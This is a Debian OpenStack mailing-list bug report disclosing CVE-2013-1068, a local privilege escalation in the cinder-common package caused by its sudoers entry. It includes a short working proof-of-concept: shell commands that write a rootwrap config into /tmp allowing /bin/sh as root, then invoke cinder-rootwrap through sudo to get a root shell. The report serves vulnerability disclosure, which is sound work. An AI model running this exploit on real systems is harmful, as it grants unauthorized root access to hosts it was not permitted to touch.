[PKG-Openstack-devel] Bug#753585: cinder: CVE-2013-1068: local privilege escalation
Henri Salo
henri at nerv.fi
Thu Jul 3 10:24:11 UTC 2014
Package: cinder-common
Version: 2014.1.1-2
Severity: grave
Tags: security, confirmed
After installing cinder-common file /etc/sudoers.d/cinder-common is created. If
/etc/sudoers contains "#includedir /etc/sudoers.d" cinder is vulnerable to
CVE-2013-1068 local privilege escalation. Vulnerability does not need working
OpenStack installation. If I am correct OpenStack does not work without
includedir configuration so it might be usually enabled in OpenStack instances.
PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019
"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id
"""
---
Henri Salo
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/openstack-devel/attachments/20140703/020f59e0/attachment.sig>
More information about the Openstack-devel
mailing list